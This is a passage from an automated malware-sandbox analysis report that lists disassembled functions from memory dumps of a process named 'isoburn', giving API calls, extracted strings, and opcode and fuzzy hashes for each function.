                                                                                • Instruction Fuzzy Hash: D1D05E712802083BF610B6F99C06F96368D5B44768F844064BA0CE72C2EE64F04045B5
                                                                                Function 02A50D3B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(?,00000111), ref: 02A50D47
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2a40000_isoburn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                • Instruction ID: bab76e2b8a79c1cb150c58c4e10dc52857d3799f57368d8ea5f914d0f446bdd3
                                                                                • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                • Instruction Fuzzy Hash: AED0A76770011C36A60145846CC1DFFB75CDB847A5F004063FF08D1040D621590206B0
                                                                                Function 04EA2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 18ed71c4fe8cf129968b0504e33c1898efa37eeae6211e29c973aa0523c5d9b0
                                                                                • Instruction ID: be1ba1b8c85ae0e5915169de6ceb9ccbc0539fdb5f2628a14f05e022699eb0cd
                                                                                • Opcode Fuzzy Hash: 18ed71c4fe8cf129968b0504e33c1898efa37eeae6211e29c973aa0523c5d9b0
                                                                                • Instruction Fuzzy Hash: D3B09B719015C5C5FB51F7604A0971779047BD0705F15D0A1D3431651E4738E1D1F5B5

                                                                                Non-executed Functions

                                                                                Function 04BD04F8 Relevance: .1, Instructions: 146COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732574046.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4bd0000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 472f6697d32d9fe9632113f7375ceada51e32632cf1883ff78d79e9ed814f6cc
                                                                                • Instruction ID: 2c5e18deff422da0e0a5e7ee62752a7a0aeb640327f0469899d739fab00e88cd
                                                                                • Opcode Fuzzy Hash: 472f6697d32d9fe9632113f7375ceada51e32632cf1883ff78d79e9ed814f6cc
                                                                                • Instruction Fuzzy Hash: 98411570618F0D4FD768EF689081276B3E2FB89308F5006ADC98AC3252FB74F8468785
                                                                                Function 04BDDF59 Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732574046.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4bd0000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                • API String ID: 0-3558027158
                                                                                • Opcode ID: c3f6bb3eb17d3cf2440808d53dad2e0acb0b3211d8a5a46298aef4fe41500a8d
                                                                                • Instruction ID: 2932b294f50968da0eedd107c6b5a652ee72cb791f3ed5638b8935a8a80427bb
                                                                                • Opcode Fuzzy Hash: c3f6bb3eb17d3cf2440808d53dad2e0acb0b3211d8a5a46298aef4fe41500a8d
                                                                                • Instruction Fuzzy Hash: C7915FF04082988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                Function 04EA2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: 8ddea9413156371a012172e5facaf3161146a788b97cb03c984c603ab67c3ad9
                                                                                • Instruction ID: ea49662efd44b6052cced3ce115a44f38cde6d8eb0259c1afa6d8a20d153d7d3
                                                                                • Opcode Fuzzy Hash: 8ddea9413156371a012172e5facaf3161146a788b97cb03c984c603ab67c3ad9
                                                                                • Instruction Fuzzy Hash: 4B51EAB2E00116BFDB10DF98899057FF7B8BB08604B1491A9E595EB741E234FE508BE1
                                                                                Function 04E97630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04ED4725
                                                                                • Execute=1, xrefs: 04ED4713
                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04ED4742
                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04ED46FC
                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 04ED4787
                                                                                • ExecuteOptions, xrefs: 04ED46A0
                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04ED4655
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                • API String ID: 0-484625025
                                                                                • Opcode ID: 75af34680dc7d2506fd62727b41e0b15042db8f7956fbffd84ff7c8d452aa521
                                                                                • Instruction ID: 7f91b4dc19962bbb04ba21bc7852ceb85ab1afa5a83a242f107a565cefd42039
                                                                                • Opcode Fuzzy Hash: 75af34680dc7d2506fd62727b41e0b15042db8f7956fbffd84ff7c8d452aa521
                                                                                • Instruction Fuzzy Hash: AC51F971650219BAEF14AFA4EC89FE977E8EF44308F0414A9E605AB1C1E770BE49CF51
                                                                                Function 04BD3BD9 Relevance: 12.6, Strings: 10, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732574046.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4bd0000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$^V^Y
                                                                                • API String ID: 0-2612338985
                                                                                • Opcode ID: 7bef59d175adce2c3e5606e9e343edfb177df956938c7e4c98610004d0ab4be2
                                                                                • Instruction ID: 35637769dab0c90561c43288e47eb697260b9f065288fec2a86b6a4b6c38723e
                                                                                • Opcode Fuzzy Hash: 7bef59d175adce2c3e5606e9e343edfb177df956938c7e4c98610004d0ab4be2
                                                                                • Instruction Fuzzy Hash: AE2155B044474DDBCF14DF90D455ADEBBF1FF14348F8250A8E819AE202C77582A9CB89
                                                                                Function 04EAB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-$0$0
                                                                                • API String ID: 1302938615-699404926
                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction ID: fb8267a1b802d719fb74cc99fa08390df2c8bdea7bc945f3ffc962106413a45b
                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                • Instruction Fuzzy Hash: E2810630E052498EDF24CF68C8507FEBBB2AF85314F186659EA61AF2D1D770B860CB51
                                                                                Function 04E8F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RTL: Re-Waiting, xrefs: 04ED031E
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04ED02BD
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04ED02E7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                • API String ID: 0-2474120054
                                                                                • Opcode ID: 37de55b05e09f2577975e5eb44a810ea29aa89ad51bbf790657c7df9da7c6b7f
                                                                                • Instruction ID: e5c42ece0e6b356816b40fd78367ad51142e5931197b6f63dc0e68a725966446
                                                                                • Opcode Fuzzy Hash: 37de55b05e09f2577975e5eb44a810ea29aa89ad51bbf790657c7df9da7c6b7f
                                                                                • Instruction Fuzzy Hash: AEE1BF306047419FEB25DF28C884B6AB7E0BF88318F141A5DF5A98B2E1E775F845CB52
                                                                                Function 04E9BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • RTL: Re-Waiting, xrefs: 04ED7BAC
                                                                                • RTL: Resource at %p, xrefs: 04ED7B8E
                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04ED7B7F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 0-871070163
                                                                                • Opcode ID: 28e12496975c4ba80c3a7f260379d73f7cf9a476f3fb5fcf4de57513bf31a8a5
                                                                                • Instruction ID: f7f3cef0894dfd9fef031fb7135f2b80892bea4bf0ab4ab0346a3d2b6f2d4fa2
                                                                                • Opcode Fuzzy Hash: 28e12496975c4ba80c3a7f260379d73f7cf9a476f3fb5fcf4de57513bf31a8a5
                                                                                • Instruction Fuzzy Hash: 1F41B1353047069FDB24DF25DC40B6AB7E6FF88718F101A1DE95A9B680DB71F8068B91
                                                                                Function 04E9B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04ED728C
                                                                                Strings
                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04ED7294
                                                                                • RTL: Re-Waiting, xrefs: 04ED72C1
                                                                                • RTL: Resource at %p, xrefs: 04ED72A3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-605551621
                                                                                • Opcode ID: e5db805ec883db5dc6566670900a2d43d6190cee3e08c0f9ff59e2bb33bb8373
                                                                                • Instruction ID: b1018ce038e1e5e1287a3c69edc7eaa21ae63bab98f081eaf16a4bc36d8eabb0
                                                                                • Opcode Fuzzy Hash: e5db805ec883db5dc6566670900a2d43d6190cee3e08c0f9ff59e2bb33bb8373
                                                                                • Instruction Fuzzy Hash: 9C41FF71700242AFDB24DF25DC41B6AB7E5FB84718F102A19F995EB280EB21F8529BD1
                                                                                Function 04EA7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-
                                                                                • API String ID: 1302938615-2137968064
                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction ID: 0d4867bf1aff81c43f0554ad86e2d8bc1d9c809a6b558163044f143c54f733b5
                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                • Instruction Fuzzy Hash: 4C918574E002159BEF24DF69C8816BEB7A5BF44724F14A51AE855EF2C0E730FA61C760
                                                                                Function 04E69126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $$@
                                                                                • API String ID: 0-1194432280
                                                                                • Opcode ID: 2e5b81dd185413f4530a143c3a4dd6dc0f4df7603db7340a94a3d7aab5a663a2
                                                                                • Instruction ID: 781947a91c2194b05d47c6cbcd96ea5aa27988d2e0f549787350a5efec82ade1
                                                                                • Opcode Fuzzy Hash: 2e5b81dd185413f4530a143c3a4dd6dc0f4df7603db7340a94a3d7aab5a663a2
                                                                                • Instruction Fuzzy Hash: 27813CB1D402699BDB35DB54CD44BEEB7B8AF08754F0051EAAA19B7240E7306E85CFA0
                                                                                Function 04EECEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 04EECFBD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3732692960.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E30000, based on PE: true
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004F5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000C.00000002.3732692960.0000000004FCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_4e30000_isoburn.jbxd
                                                                                Similarity
                                                                                • API ID: CallFilterFunc@8
                                                                                • String ID: @$@4rw@4rw
                                                                                • API String ID: 4062629308-2979693914
                                                                                • Opcode ID: 8b933b605ffda226a626c08c5a6ffd1172cfade0e964b2c5da9d98e647c6253f
                                                                                • Instruction ID: dbcf53a775fce7af61db59e264f250d8950a3ab07cf303cb9e1021bae116af62
                                                                                • Opcode Fuzzy Hash: 8b933b605ffda226a626c08c5a6ffd1172cfade0e964b2c5da9d98e647c6253f
                                                                                • Instruction Fuzzy Hash: C941DF71900618DFEB21DFA9D840ABEBBF8FF44B18F14512AEA15DB260D734E801CB61